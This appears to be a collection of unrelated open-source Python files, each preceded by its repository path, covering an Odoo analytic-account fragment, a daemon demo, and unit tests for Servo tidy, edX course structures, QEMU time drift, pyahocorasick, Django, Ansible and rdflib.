res_prod['value'].update({'account_analytic_id': False})
return res_prod
account_invoice_line()
class stock_picking(osv.osv):
_inherit = "stock.picking"
def _get_account_analytic_invoice(self, cursor, user, picking, move_line):
partner_id = picking.partner_id and picking.partner_id.id or False
rec = self.pool.get('account.analytic.default').account_get(cursor, user, move_line.product_id.id, partner_id , user, time.strftime('%Y-%m-%d'), context={})
if rec:
return rec.analytic_id.id
return super(stock_picking, self)._get_account_analytic_invoice(cursor, user, picking, move_line)
stock_picking()
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
# Method overridden to set the analytic account by default on criterion match
def invoice_line_create(self, cr, uid, ids, context=None):
create_ids = super(sale_order_line, self).invoice_line_create(cr, uid, ids, context=context)
if not ids:
return create_ids
sale_line = self.browse(cr, uid, ids[0], context=context)
inv_line_obj = self.pool.get('account.invoice.line')
anal_def_obj = self.pool.get('account.analytic.default')
for line in inv_line_obj.browse(cr, uid, create_ids, context=context):
rec = anal_def_obj.account_get(cr, uid, line.product_id.id, sale_line.order_id.partner_id.id, sale_line.order_id.user_id.id, time.strftime('%Y-%m-%d'), context=context)
if rec:
inv_line_obj.write(cr, uid, [line.id], {'account_analytic_id': rec.analytic_id.id}, context=context)
return create_ids
sale_order_line()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
AJellyBean/CloudPan
|
refs/heads/master
|
python/wallpaper_plugin/test.py
|
1
|
# coding=utf8
# python 2.7
import time, platform
import os
import sys
import re
import fcntl
# import pidfile
def funzioneDemo():
# 这是具体业务函数示例
fout = open('/tmp/demone.log', 'w')
while True:
fout.write(time.ctime() + '\n')
fout.flush()
time.sleep(2)
fout.close()
def createDaemon():
# fork进程
try:
if os.fork() > 0: os._exit(0)
except OSError, error:
print 'fork #1 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
print 'Daemon PID %d' % pid
os._exit(0)
except OSError, error:
print 'fork #2 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
# 重定向标准IO
sys.stdout.flush()
sys.stderr.flush()
si = file("/dev/null", 'r')
so = file("/dev/null", 'a+')
se = file("/dev/null", 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# 在子进程中执行代码
funzioneDemo() # function demo
# check function
if __name__ == '__main__':
if platform.system() == "Linux":
createDaemon()
else:
os._exit(0)
|
nox/servo
|
refs/heads/master
|
python/tidy/servo_tidy_tests/test_tidy.py
|
4
|
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
import os
import unittest
from servo_tidy import tidy
base_path = 'servo_tidy_tests/' if os.path.exists('servo_tidy_tests/') else 'python/tidy/servo_tidy_tests/'
def iterFile(name):
return iter([os.path.join(base_path, name)])
class CheckTidiness(unittest.TestCase):
def assertNoMoreErrors(self, errors):
with self.assertRaises(StopIteration):
errors.next()
def test_tidy_config(self):
errors = tidy.check_config_file(os.path.join(base_path, 'servo-tidy.toml'), print_text=False)
self.assertEqual("invalid config key 'key-outside'", errors.next()[2])
self.assertEqual("invalid config key 'wrong-key'", errors.next()[2])
self.assertEqual('invalid config table [wrong]', errors.next()[2])
self.assertEqual("ignored file './fake/file.html' doesn't exist", errors.next()[2])
self.assertEqual("ignored directory './fake/dir' doesn't exist", errors.next()[2])
self.assertNoMoreErrors(errors)
def test_directory_checks(self):
dirs = {
os.path.join(base_path, "dir_check/webidl_plus"): ['webidl', 'test'],
os.path.join(base_path, "dir_check/only_webidl"): ['webidl']
}
errors = tidy.check_directory_files(dirs)
error_dir = os.path.join(base_path, "dir_check/webidl_plus")
self.assertEqual("Unexpected extension found for test.rs. We only expect files with webidl, test extensions in {0}".format(error_dir), errors.next()[2])
self.assertEqual("Unexpected extension found for test2.rs. We only expect files with webidl, test extensions in {0}".format(error_dir), errors.next()[2])
self.assertNoMoreErrors(errors)
def test_spaces_correctnes(self):
errors = tidy.collect_errors_for_files(iterFile('wrong_space.rs'), [], [tidy.check_by_line], print_text=False)
self.assertEqual('trailing whitespace', errors.next()[2])
self.assertEqual('no newline at EOF', errors.next()[2])
self.assertEqual('tab on line', errors.next()[2])
self.assertEqual('CR on line', errors.next()[2])
self.assertEqual('no newline at EOF', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_empty_file(self):
errors = tidy.collect_errors_for_files(iterFile('empty_file.rs'), [], [tidy.check_by_line], print_text=False)
self.assertEqual('file is empty', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_long_line(self):
errors = tidy.collect_errors_for_files(iterFile('long_line.rs'), [], [tidy.check_by_line], print_text=False)
self.assertEqual('Line is longer than 120 characters', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_whatwg_link(self):
errors = tidy.collect_errors_for_files(iterFile('whatwg_link.rs'), [], [tidy.check_by_line], print_text=False)
self.assertTrue('link to WHATWG may break in the future, use this format instead:' in errors.next()[2])
self.assertTrue('links to WHATWG single-page url, change to multi page:' in errors.next()[2])
self.assertNoMoreErrors(errors)
def test_license(self):
errors = tidy.collect_errors_for_files(iterFile('incorrect_license.rs'), [], [tidy.check_license], print_text=False)
self.assertEqual('incorrect license', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_shebang_license(self):
errors = tidy.collect_errors_for_files(iterFile('shebang_license.py'), [], [tidy.check_license], print_text=False)
self.assertEqual('missing blank line after shebang', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_shell(self):
errors = tidy.collect_errors_for_files(iterFile('shell_tidy.sh'), [], [tidy.check_shell], print_text=False)
self.assertEqual('script does not have shebang "#!/usr/bin/env bash"', errors.next()[2])
self.assertEqual('script is missing options "set -o errexit", "set -o pipefail"', errors.next()[2])
self.assertEqual('script should not use backticks for command substitution', errors.next()[2])
self.assertEqual('variable substitutions should use the full \"${VAR}\" form', errors.next()[2])
self.assertEqual('script should use `[[` instead of `[` for conditional testing', errors.next()[2])
self.assertEqual('script should use `[[` instead of `[` for conditional testing', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_apache2_incomplete(self):
errors = tidy.collect_errors_for_files(iterFile('apache2_license.rs'), [], [tidy.check_license])
self.assertEqual('incorrect license', errors.next()[2])
def test_rust(self):
errors = tidy.collect_errors_for_files(iterFile('rust_tidy.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('extra space after {', errors.next()[2])
self.assertEqual('extra space before }', errors.next()[2])
self.assertEqual('use statement spans multiple lines', errors.next()[2])
self.assertEqual('missing space before }', errors.next()[2])
self.assertTrue('use statement is not in alphabetical order' in errors.next()[2])
self.assertEqual('use statement contains braces for single import', errors.next()[2])
self.assertTrue('use statement is not in alphabetical order' in errors.next()[2])
self.assertEqual('encountered whitespace following a use statement', errors.next()[2])
self.assertTrue('mod declaration is not in alphabetical order' in errors.next()[2])
self.assertEqual('mod declaration spans multiple lines', errors.next()[2])
self.assertTrue('extern crate declaration is not in alphabetical order' in errors.next()[2])
self.assertEqual('found an empty line following a {', errors.next()[2])
self.assertEqual('missing space before ->', errors.next()[2])
self.assertEqual('missing space after ->', errors.next()[2])
self.assertEqual('missing space after :', errors.next()[2])
self.assertEqual('missing space before {', errors.next()[2])
self.assertEqual('missing space before =', errors.next()[2])
self.assertEqual('missing space after =', errors.next()[2])
self.assertEqual('missing space before -', errors.next()[2])
self.assertEqual('missing space before *', errors.next()[2])
self.assertEqual('missing space after =>', errors.next()[2])
self.assertEqual('missing space after :', errors.next()[2])
self.assertEqual('missing space after :', errors.next()[2])
self.assertEqual('extra space before :', errors.next()[2])
self.assertEqual('extra space before :', errors.next()[2])
self.assertEqual('use &[T] instead of &Vec<T>', errors.next()[2])
self.assertEqual('use &str instead of &String', errors.next()[2])
self.assertEqual('use &T instead of &Root<T>', errors.next()[2])
self.assertEqual('encountered function signature with -> ()', errors.next()[2])
self.assertEqual('operators should go at the end of the first line', errors.next()[2])
self.assertEqual('else braces should be on the same line', errors.next()[2])
self.assertEqual('extra space after (', errors.next()[2])
self.assertEqual('extra space after (', errors.next()[2])
self.assertEqual('extra space after (', errors.next()[2])
self.assertEqual('extra space after test_fun', errors.next()[2])
self.assertEqual('no = in the beginning of line', errors.next()[2])
self.assertEqual('space before { is not a multiple of 4', errors.next()[2])
self.assertEqual('space before } is not a multiple of 4', errors.next()[2])
self.assertNoMoreErrors(errors)
feature_errors = tidy.collect_errors_for_files(iterFile('lib.rs'), [], [tidy.check_rust], print_text=False)
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertNoMoreErrors(feature_errors)
ban_errors = tidy.collect_errors_for_files(iterFile('ban.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('Banned type Cell<JSVal> detected. Use MutJS<JSVal> instead', ban_errors.next()[2])
self.assertNoMoreErrors(ban_errors)
ban_errors = tidy.collect_errors_for_files(iterFile('ban-domrefcell.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('Banned type DOMRefCell<JS<T>> detected. Use MutJS<JS<T>> instead', ban_errors.next()[2])
self.assertNoMoreErrors(ban_errors)
def test_spec_link(self):
tidy.SPEC_BASE_PATH = base_path
errors = tidy.collect_errors_for_files(iterFile('speclink.rs'), [], [tidy.check_spec], print_text=False)
self.assertEqual('method declared in webidl is missing a comment with a specification link', errors.next()[2])
self.assertEqual('method declared in webidl is missing a comment with a specification link', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_script_thread(self):
errors = tidy.collect_errors_for_files(iterFile('script_thread.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('use a separate variable for the match expression', errors.next()[2])
self.assertEqual('use a separate variable for the match expression', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_webidl(self):
errors = tidy.collect_errors_for_files(iterFile('spec.webidl'), [tidy.check_webidl_spec], [], print_text=False)
self.assertEqual('No specification link found.', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_toml(self):
errors = tidy.collect_errors_for_files(iterFile('Cargo.toml'), [tidy.check_toml], [], print_text=False)
self.assertEqual('found asterisk instead of minimum version number', errors.next()[2])
self.assertEqual('.toml file should contain a valid license.', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_modeline(self):
errors = tidy.collect_errors_for_files(iterFile('modeline.txt'), [], [tidy.check_modeline], print_text=False)
self.assertEqual('vi modeline present', errors.next()[2])
self.assertEqual('vi modeline present', errors.next()[2])
self.assertEqual('vi modeline present', errors.next()[2])
self.assertEqual('emacs file variables present', errors.next()[2])
self.assertEqual('emacs file variables present', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_malformed_json(self):
errors = tidy.collect_errors_for_files(iterFile('malformed_json.json'), [tidy.check_json], [], print_text=False)
self.assertEqual('Invalid control character at: line 3 column 40 (char 61)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_json_with_duplicate_key(self):
errors = tidy.collect_errors_for_files(iterFile('duplicate_key.json'), [tidy.check_json], [], print_text=False)
self.assertEqual('Duplicated Key (the_duplicated_key)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_json_with_unordered_keys(self):
tidy.config["check-ordered-json-keys"].append('python/tidy/servo_tidy_tests/unordered_key.json')
errors = tidy.collect_errors_for_files(iterFile('unordered_key.json'), [tidy.check_json], [], print_text=False)
self.assertEqual('Unordered key (found b before a)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_yaml_with_duplicate_key(self):
errors = tidy.collect_errors_for_files(iterFile('duplicate_keys_buildbot_steps.yml'), [tidy.check_yaml], [], print_text=False)
self.assertEqual('Duplicated Key (duplicate_yaml_key)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_non_list_mapped_buildbot_steps(self):
errors = tidy.collect_errors_for_files(iterFile('non_list_mapping_buildbot_steps.yml'), [tidy.check_yaml], [], print_text=False)
self.assertEqual("Key 'non-list-key' maps to type 'str', but list expected", errors.next()[2])
self.assertNoMoreErrors(errors)
def test_non_string_list_mapping_buildbot_steps(self):
errors = tidy.collect_errors_for_files(iterFile('non_string_list_buildbot_steps.yml'), [tidy.check_yaml], [], print_text=False)
self.assertEqual("List mapped to 'mapping_key' contains non-string element", errors.next()[2])
self.assertNoMoreErrors(errors)
def test_lock(self):
errors = tidy.collect_errors_for_files(iterFile('duplicated_package.lock'), [tidy.check_lock], [], print_text=False)
msg = """duplicate versions for package `test`
\t\x1b[93mThe following packages depend on version 0.4.9 from 'crates.io':\x1b[0m
\t\ttest2
\t\x1b[93mThe following packages depend on version 0.5.1 from 'crates.io':\x1b[0m"""
self.assertEqual(msg, errors.next()[2])
msg2 = """duplicate versions for package `test3`
\t\x1b[93mThe following packages depend on version 0.5.1 from 'crates.io':\x1b[0m
\t\ttest4
\t\x1b[93mThe following packages depend on version 0.5.1 from 'https://github.com/user/test3':\x1b[0m
\t\ttest5"""
self.assertEqual(msg2, errors.next()[2])
self.assertNoMoreErrors(errors)
def test_lint_runner(self):
test_path = base_path + 'lints/'
runner = tidy.LintRunner(only_changed_files=False, progress=False)
runner.path = test_path + 'some-fictional-file'
self.assertEqual([(runner.path, 0, "file does not exist")], list(runner.check()))
runner.path = test_path + 'not_script'
self.assertEqual([(runner.path, 0, "lint should be a python script")],
list(runner.check()))
runner.path = test_path + 'not_inherited.py'
self.assertEqual([(runner.path, 1, "class 'Lint' should inherit from 'LintRunner'")],
list(runner.check()))
runner.path = test_path + 'no_lint.py'
self.assertEqual([(runner.path, 1, "script should contain a class named 'Lint'")],
list(runner.check()))
runner.path = test_path + 'no_run.py'
self.assertEqual([(runner.path, 0, "class 'Lint' should implement 'run' method")],
list(runner.check()))
runner.path = test_path + 'invalid_error_tuple.py'
self.assertEqual([(runner.path, 1, "errors should be a tuple of (path, line, reason)")],
list(runner.check()))
runner.path = test_path + 'proper_file.py'
self.assertEqual([('path', 0, "foobar")], list(runner.check()))
def test_file_list(self):
base_path='./python/tidy/servo_tidy_tests/test_ignored'
file_list = tidy.FileList(base_path, only_changed_files=False, exclude_dirs=[])
lst = list(file_list)
self.assertEqual([os.path.join(base_path, 'whee', 'test.rs'), os.path.join(base_path, 'whee', 'foo', 'bar.rs')], lst)
file_list = tidy.FileList(base_path, only_changed_files=False,
exclude_dirs=[os.path.join(base_path, 'whee', 'foo')])
lst = list(file_list)
self.assertEqual([os.path.join(base_path, 'whee', 'test.rs')], lst)
def do_tests():
suite = unittest.TestLoader().loadTestsFromTestCase(CheckTidiness)
return 0 if unittest.TextTestRunner(verbosity=2).run(suite).wasSuccessful() else 1
|
10clouds/edx-platform
|
refs/heads/dev
|
openedx/core/djangoapps/content/course_structures/tests.py
|
7
|
"""
Course Structure Content sub-application test cases
"""
import json
from nose.plugins.attrib import attr
from xmodule_django.models import UsageKey
from xmodule.modulestore.django import SignalHandler
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from openedx.core.djangoapps.content.course_structures.models import CourseStructure
from openedx.core.djangoapps.content.course_structures.signals import listen_for_course_publish
from openedx.core.djangoapps.content.course_structures.tasks import _generate_course_structure, update_course_structure
class SignalDisconnectTestMixin(object):
"""
Mixin for tests to disable calls to signals.listen_for_course_publish when the course_published signal is fired.
"""
def setUp(self):
super(SignalDisconnectTestMixin, self).setUp()
SignalHandler.course_published.disconnect(listen_for_course_publish)
@attr('shard_2')
class CourseStructureTaskTests(ModuleStoreTestCase):
"""
Test cases covering Course Structure task-related workflows
"""
def setUp(self, **kwargs):
super(CourseStructureTaskTests, self).setUp()
self.course = CourseFactory.create(org='TestX', course='TS101', run='T1')
self.section = ItemFactory.create(parent=self.course, category='chapter', display_name='Test Section')
self.discussion_module_1 = ItemFactory.create(
parent=self.course,
category='discussion',
discussion_id='test_discussion_id_1'
)
self.discussion_module_2 = ItemFactory.create(
parent=self.course,
category='discussion',
discussion_id='test_discussion_id_2'
)
CourseStructure.objects.all().delete()
def test_generate_course_structure(self):
blocks = {}
def add_block(block):
"""
Inserts new child XBlocks into the existing course tree
"""
children = block.get_children() if block.has_children else []
blocks[unicode(block.location)] = {
"usage_key": unicode(block.location),
"block_type": block.category,
"display_name": block.display_name,
"graded": block.graded,
"format": block.format,
"children": [unicode(child.location) for child in children]
}
for child in children:
add_block(child)
add_block(self.course)
expected = {
'root': unicode(self.course.location),
'blocks': blocks
}
self.maxDiff = None
actual = _generate_course_structure(self.course.id)
self.assertDictEqual(actual['structure'], expected)
def test_structure_json(self):
"""
Although stored as compressed data, CourseStructure.structure_json should always return the uncompressed string.
"""
course_id = 'a/b/c'
structure = {
'root': course_id,
'blocks': {
course_id: {
'id': course_id
}
}
}
structure_json = json.dumps(structure)
structure = CourseStructure.objects.create(course_id=self.course.id, structure_json=structure_json)
self.assertEqual(structure.structure_json, structure_json)
# Reload the data to ensure the init signal is fired to decompress the data.
cs = CourseStructure.objects.get(course_id=self.course.id)
self.assertEqual(cs.structure_json, structure_json)
def test_structure(self):
"""
CourseStructure.structure should return the uncompressed, JSON-parsed course structure.
"""
structure = {
'root': 'a/b/c',
'blocks': {
'a/b/c': {
'id': 'a/b/c'
}
}
}
structure_json = json.dumps(structure)
cs = CourseStructure.objects.create(course_id=self.course.id, structure_json=structure_json)
self.assertDictEqual(cs.structure, structure)
def test_ordered_blocks(self):
structure = {
'root': 'a/b/c',
'blocks': {
'a/b/c': {
'id': 'a/b/c',
'children': [
'g/h/i'
]
},
'd/e/f': {
'id': 'd/e/f',
'children': []
},
'g/h/i': {
'id': 'h/j/k',
'children': [
'j/k/l',
'd/e/f'
]
},
'j/k/l': {
'id': 'j/k/l',
'children': []
}
}
}
in_order_blocks = ['a/b/c', 'g/h/i', 'j/k/l', 'd/e/f']
structure_json = json.dumps(structure)
retrieved_course_structure = CourseStructure.objects.create(
course_id=self.course.id, structure_json=structure_json
)
self.assertEqual(retrieved_course_structure.ordered_blocks.keys(), in_order_blocks)
def test_block_with_missing_fields(self):
"""
The generator should continue to operate on blocks/XModule that do not have graded or format fields.
"""
# TODO In the future, test logging using testfixtures.LogCapture
# (https://pythonhosted.org/testfixtures/logging.html). Talk to TestEng before adding that library.
category = 'peergrading'
display_name = 'Testing Module'
module = ItemFactory.create(parent=self.section, category=category, display_name=display_name)
structure = _generate_course_structure(self.course.id)
usage_key = unicode(module.location)
actual = structure['structure']['blocks'][usage_key]
expected = {
"usage_key": usage_key,
"block_type": category,
"display_name": display_name,
"graded": False,
"format": None,
"children": []
}
self.assertEqual(actual, expected)
def test_generate_discussion_id_map(self):
id_map = {}
def add_block(block):
"""Adds the given block and all of its children to the expected discussion id map"""
children = block.get_children() if block.has_children else []
if block.category == 'discussion':
id_map[block.discussion_id] = unicode(block.location)
for child in children:
add_block(child)
add_block(self.course)
actual = _generate_course_structure(self.course.id)
self.assertEqual(actual['discussion_id_map'], id_map)
def test_discussion_id_map_json(self):
id_map = {
'discussion_id_1': 'module_location_1',
'discussion_id_2': 'module_location_2'
}
id_map_json = json.dumps(id_map)
structure = CourseStructure.objects.create(course_id=self.course.id, discussion_id_map_json=id_map_json)
self.assertEqual(structure.discussion_id_map_json, id_map_json)
structure = CourseStructure.objects.get(course_id=self.course.id)
self.assertEqual(structure.discussion_id_map_json, id_map_json)
def test_discussion_id_map(self):
id_map = {
'discussion_id_1': 'block-v1:TestX+TS101+T1+type@discussion+block@b141953dff414921a715da37eb14ecdc',
'discussion_id_2': 'i4x://TestX/TS101/discussion/466f474fa4d045a8b7bde1b911e095ca'
}
id_map_json = json.dumps(id_map)
structure = CourseStructure.objects.create(course_id=self.course.id, discussion_id_map_json=id_map_json)
expected_id_map = {
key: UsageKey.from_string(value).map_into_course(self.course.id)
for key, value in id_map.iteritems()
}
self.assertEqual(structure.discussion_id_map, expected_id_map)
def test_discussion_id_map_missing(self):
structure = CourseStructure.objects.create(course_id=self.course.id)
self.assertIsNone(structure.discussion_id_map)
def test_update_course_structure(self):
"""
Test the actual task that orchestrates data generation and updating the database.
"""
# Method requires string input
course_id = self.course.id
self.assertRaises(ValueError, update_course_structure, course_id)
# Ensure a CourseStructure object is created
expected_structure = _generate_course_structure(course_id)
update_course_structure(unicode(course_id))
structure = CourseStructure.objects.get(course_id=course_id)
self.assertEqual(structure.course_id, course_id)
self.assertEqual(structure.structure, expected_structure['structure'])
self.assertEqual(structure.discussion_id_map.keys(), expected_structure['discussion_id_map'].keys())
self.assertEqual(
[unicode(value) for value in structure.discussion_id_map.values()],
expected_structure['discussion_id_map'].values()
)
|
ehabkost/tp-qemu
|
refs/heads/master
|
qemu/tests/timedrift_with_migration.py
|
7
|
import logging
from autotest.client.shared import error
from virttest import utils_test
def run(test, params, env):
"""
Time drift test with migration:
1) Log into a guest.
2) Take a time reading from the guest and host.
3) Migrate the guest.
4) Take a second time reading.
5) If the drift (in seconds) is higher than a user specified value, fail.
:param test: QEMU test object.
:param params: Dictionary with test parameters.
:param env: Dictionary with the test environment.
"""
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
boot_option_added = params.get("boot_option_added")
boot_option_removed = params.get("boot_option_removed")
if boot_option_added or boot_option_removed:
utils_test.update_boot_option(vm,
args_removed=boot_option_removed,
args_added=boot_option_added)
timeout = int(params.get("login_timeout", 360))
session = vm.wait_for_login(timeout=timeout)
# Collect test parameters:
# Command to run to get the current time
time_command = params["time_command"]
# Filter which should match a string to be passed to time.strptime()
time_filter_re = params["time_filter_re"]
# Time format for time.strptime()
time_format = params["time_format"]
drift_threshold = float(params.get("drift_threshold", "10"))
drift_threshold_single = float(params.get("drift_threshold_single", "3"))
migration_iterations = int(params.get("migration_iterations", 1))
try:
# Get initial time
# (ht stands for host time, gt stands for guest time)
(ht0, gt0) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
# Migrate
for i in range(migration_iterations):
# Get time before current iteration
(ht0_, gt0_) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
session.close()
# Run current iteration
logging.info("Migrating: iteration %d of %d...",
(i + 1), migration_iterations)
vm.migrate()
# Log in
logging.info("Logging in after migration...")
session = vm.wait_for_login(timeout=30)
logging.info("Logged in after migration")
# Get time after current iteration
(ht1_, gt1_) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
# Report iteration results
host_delta = ht1_ - ht0_
guest_delta = gt1_ - gt0_
drift = abs(host_delta - guest_delta)
logging.info("Host duration (iteration %d): %.2f",
(i + 1), host_delta)
logging.info("Guest duration (iteration %d): %.2f",
(i + 1), guest_delta)
logging.info("Drift at iteration %d: %.2f seconds",
(i + 1), drift)
# Fail if necessary
if drift > drift_threshold_single:
raise error.TestFail("Time drift too large at iteration %d: "
"%.2f seconds" % (i + 1, drift))
# Get final time
(ht1, gt1) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
finally:
if session:
session.close()
# remove flags add for this test.
if boot_option_added or boot_option_removed:
utils_test.update_boot_option(vm,
args_removed=boot_option_added,
args_added=boot_option_removed)
# Report results
host_delta = ht1 - ht0
guest_delta = gt1 - gt0
drift = abs(host_delta - guest_delta)
logging.info("Host duration (%d migrations): %.2f",
migration_iterations, host_delta)
logging.info("Guest duration (%d migrations): %.2f",
migration_iterations, guest_delta)
logging.info("Drift after %d migrations: %.2f seconds",
migration_iterations, drift)
# Fail if necessary
if drift > drift_threshold:
raise error.TestFail("Time drift too large after %d migrations: "
"%.2f seconds" % (migration_iterations, drift))
|
pombredanne/pyahocorasick
|
refs/heads/master
|
dump2dot.py
|
2
|
"""
Aho-Corasick string search algorithm.
Author : Wojciech Muła, wojciech_mula@poczta.onet.pl
WWW : http://0x80.pl
License : public domain
"""
import ahocorasick
import os
from ahocorasick import EMPTY, TRIE, AHOCORASICK;
def dump2dot(automaton, file):
def writeln(text=""):
file.write(text + "\n")
def nodename(nodeid):
return 'node%x' % (nodeid & 0xffffffff)
if automaton.kind == EMPTY:
writeln("digraph empty {}")
return
if automaton.kind == TRIE:
name = "trie"
else:
name = "ahocorasick"
writeln("digraph %s {" % name)
nodes, edges, fail = automaton.dump()
# nodes
for nodeid, end in nodes:
if end:
attr = '[shape=doublecircle, label=""]'
else:
attr = '[shape=circle, label=""]'
writeln("\t%s %s" % (nodename(nodeid), attr))
def format_label(label):
label = str(label, 'ascii')
label = label.replace('"', r'\"')
return '"%s"' % label
# trie edges
for nodeid, label, destid in edges:
writeln("\t%s -> %s [label=%s]" % (nodename(nodeid), nodename(destid), format_label(label)))
# fail links
for nodeid, failid in fail:
writeln("\t%s -> %s [color=blue]" % (nodename(nodeid), nodename(failid)))
writeln("}")
def show(automaton):
path = '/dev/shm/%s.dot' % os.getpid()
with open(path, 'wt') as f:
dump2dot(automaton, f)
os.system("xdot %s" % path)
#os.system("dotty %s" % path)
os.unlink(path)
if __name__ == '__main__':
A = ahocorasick.Automaton(ahocorasick.STORE_LENGTH)
A.add_word("he")
A.add_word("her")
A.add_word("hers")
A.add_word("she")
A.add_word("cat")
A.add_word("shield")
with open('trie.dot', 'wt') as f:
dump2dot(A, f)
A.make_automaton()
with open('ahocorasick.dot', 'wt') as f:
dump2dot(A, f)
|
Mixser/django
|
refs/heads/master
|
tests/utils_tests/test_tree.py
|
429
|
import copy
import unittest
from django.utils.tree import Node
class NodeTests(unittest.TestCase):
def setUp(self):
self.node1_children = [('a', 1), ('b', 2)]
self.node1 = Node(self.node1_children)
self.node2 = Node()
def test_str(self):
self.assertEqual(str(self.node1), "(DEFAULT: ('a', 1), ('b', 2))")
self.assertEqual(str(self.node2), "(DEFAULT: )")
def test_repr(self):
self.assertEqual(repr(self.node1),
"<Node: (DEFAULT: ('a', 1), ('b', 2))>")
self.assertEqual(repr(self.node2), "<Node: (DEFAULT: )>")
def test_len(self):
self.assertEqual(len(self.node1), 2)
self.assertEqual(len(self.node2), 0)
def test_bool(self):
self.assertTrue(self.node1)
self.assertFalse(self.node2)
def test_contains(self):
self.assertIn(('a', 1), self.node1)
self.assertNotIn(('a', 1), self.node2)
def test_add(self):
# start with the same children of node1 then add an item
node3 = Node(self.node1_children)
node3_added_child = ('c', 3)
# add() returns the added data
self.assertEqual(node3.add(node3_added_child, Node.default),
node3_added_child)
# we added exactly one item, len() should reflect that
self.assertEqual(len(self.node1) + 1, len(node3))
self.assertEqual(str(node3), "(DEFAULT: ('a', 1), ('b', 2), ('c', 3))")
def test_negate(self):
# negated is False by default
self.assertFalse(self.node1.negated)
self.node1.negate()
self.assertTrue(self.node1.negated)
self.node1.negate()
self.assertFalse(self.node1.negated)
def test_deepcopy(self):
node4 = copy.copy(self.node1)
node5 = copy.deepcopy(self.node1)
self.assertIs(self.node1.children, node4.children)
self.assertIsNot(self.node1.children, node5.children)
|
garbled1/ansible
|
refs/heads/devel
|
test/units/playbook/test_block.py
|
119
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests import unittest
from ansible.playbook.block import Block
from ansible.playbook.task import Task
class TestBlock(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_construct_empty_block(self):
b = Block()
def test_construct_block_with_role(self):
pass
def test_load_block_simple(self):
ds = dict(
block=[],
rescue=[],
always=[],
# otherwise=[],
)
b = Block.load(ds)
self.assertEqual(b.block, [])
self.assertEqual(b.rescue, [])
self.assertEqual(b.always, [])
# not currently used
# self.assertEqual(b.otherwise, [])
def test_load_block_with_tasks(self):
ds = dict(
block=[dict(action='block')],
rescue=[dict(action='rescue')],
always=[dict(action='always')],
# otherwise=[dict(action='otherwise')],
)
b = Block.load(ds)
self.assertEqual(len(b.block), 1)
self.assertIsInstance(b.block[0], Task)
self.assertEqual(len(b.rescue), 1)
self.assertIsInstance(b.rescue[0], Task)
self.assertEqual(len(b.always), 1)
self.assertIsInstance(b.always[0], Task)
# not currently used
# self.assertEqual(len(b.otherwise), 1)
# self.assertIsInstance(b.otherwise[0], Task)
def test_load_implicit_block(self):
ds = [dict(action='foo')]
b = Block.load(ds)
self.assertEqual(len(b.block), 1)
self.assertIsInstance(b.block[0], Task)
def test_deserialize(self):
ds = dict(
block=[dict(action='block')],
rescue=[dict(action='rescue')],
always=[dict(action='always')],
)
b = Block.load(ds)
data = dict(parent=ds, parent_type='Block')
b.deserialize(data)
self.assertIsInstance(b._parent, Block)
|
marma/rdflib
|
refs/heads/master
|
test/test_namespace.py
|
8
|
import unittest
from rdflib.graph import Graph
from rdflib.term import URIRef
from rdflib.py3compat import b
class NamespacePrefixTest(unittest.TestCase):
def test_compute_qname(self):
"""Test sequential assignment of unknown prefixes"""
g = Graph()
self.assertEqual(g.compute_qname(URIRef("http://foo/bar/baz")),
("ns1", URIRef("http://foo/bar/"), "baz"))
self.assertEqual(g.compute_qname(URIRef("http://foo/bar#baz")),
("ns2", URIRef("http://foo/bar#"), "baz"))
